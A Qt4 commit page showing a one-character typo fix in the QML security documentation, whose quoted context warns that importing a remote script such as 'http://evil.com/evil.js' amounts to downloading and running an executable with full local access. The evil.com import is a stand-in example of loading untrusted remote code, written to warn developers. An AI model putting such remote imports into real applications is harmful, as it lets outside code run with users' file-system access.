summaryrefslogtreecommitdiff
path: root/doc/src/declarative/qdeclarativesecurity.qdoc
diff options
context:
space:
mode:
authorYann Bodson <yann.bodson@nokia.com>2010-10-01 13:36:20 +1000
committerYann Bodson <yann.bodson@nokia.com>2010-10-01 13:36:20 +1000
commit183243963d523beaf4fdff6b9a7dcb679ebbc71f (patch)
treea0c16b8937705411b261f54dddc9157c35474232 /doc/src/declarative/qdeclarativesecurity.qdoc
parent2e078ddc87277e47f3e9b7a21d1197b0d7309d2d (diff)
downloadqt4-tools-183243963d523beaf4fdff6b9a7dcb679ebbc71f.tar.gz
Doc: typographical and spelling errors.
Diffstat (limited to 'doc/src/declarative/qdeclarativesecurity.qdoc')
-rw-r--r--doc/src/declarative/qdeclarativesecurity.qdoc2
1 files changed, 1 insertions, 1 deletions
diff --git a/doc/src/declarative/qdeclarativesecurity.qdoc b/doc/src/declarative/qdeclarativesecurity.qdoc
index 199e2da28d..7395af3cfb 100644
--- a/doc/src/declarative/qdeclarativesecurity.qdoc
+++ b/doc/src/declarative/qdeclarativesecurity.qdoc
@@ -48,7 +48,7 @@ import "http://evil.com/evil.js" as Evil
is equivalent to downloading "http://evil.com/evil.exe" and running it. The JavaScript execution
environment of QML does not try to stop any particular accesses, including local file system
access, just as for any native Qt application, so the "doEvil" function could do the same things
-as a native Qt application, a Python application, a Perl script, ec.
+as a native Qt application, a Python application, a Perl script, etc.
As with any application accessing other content beyond it's control, a QML application should
perform appropriate checks on untrusted data it loads.